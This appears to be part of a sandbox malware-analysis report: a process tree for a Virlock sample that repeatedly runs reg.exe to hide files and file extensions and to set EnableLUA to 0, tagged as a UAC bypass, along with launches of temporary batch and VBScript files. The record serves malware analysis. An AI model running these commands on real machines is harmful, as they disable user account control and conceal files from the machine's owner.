C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2128⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f128⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VsQkIYwI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""128⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1129⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs129⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1126⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2126⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f126⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JkwIEMEs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""126⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs127⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1124⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1125⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2124⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f124⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vGUsMYQY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""124⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs125⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1122⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2122⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f122⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eigEwQcc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""122⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs123⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1120⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2120⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f120⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\meMEQUgE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""120⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs121⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1118⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2118⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1119⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f118⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sKgwwMgI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""118⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs119⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1116⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2116⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f116⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sckkEQIY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""116⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs117⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1114⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1115⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2114⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1115⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f114⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xcQQEkYc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""114⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs115⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1112⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2112⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f112⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1113⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XIMcEkQs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""112⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs113⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1110⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1111⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2110⤵
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1111⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f110⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TkogAosc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""110⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs111⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1108⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1109⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2108⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f108⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1109⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HscwYEcg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""108⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs109⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1106⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2106⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f106⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gAAQsskQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""106⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs107⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1104⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2104⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f104⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1105⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\agUMcgAE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""104⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs105⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1102⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2102⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1103⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f102⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wqswkUIU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""102⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs103⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1100⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1101⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2100⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1101⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f100⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GCIcsokQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""100⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1101⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs101⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 198⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV199⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 298⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f98⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rAkkMUsg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""98⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs99⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 196⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 296⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f96⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pYsMUwAU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""96⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs97⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 194⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 294⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f94⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XygYMMsY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""94⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV195⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs95⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 192⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 292⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f92⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PuIMsgAQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""92⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs93⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 190⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 290⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f90⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EikYIYEE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""90⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV191⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs91⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 188⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 288⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f88⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CqcAwUow.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""88⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs89⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 186⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 286⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV187⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f86⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV187⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MsAYMIgc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""86⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs87⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 184⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV185⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 284⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f84⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uUkkEkQo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""84⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs85⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 182⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 282⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV183⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f82⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hwwMsAEY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""82⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs83⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 180⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV181⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 280⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f80⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV181⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tKwsAkgw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""80⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs81⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 178⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 278⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f78⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FIosIIUY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""78⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs79⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 176⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 276⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f76⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OmYgEIYg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""76⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs77⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 174⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 274⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV175⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f74⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sMUccIwk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe""74⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs75⤵
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 172⤵
- Modifies visibility of file extensions in Explorer
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 272⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f72⤵
- UAC bypass
-
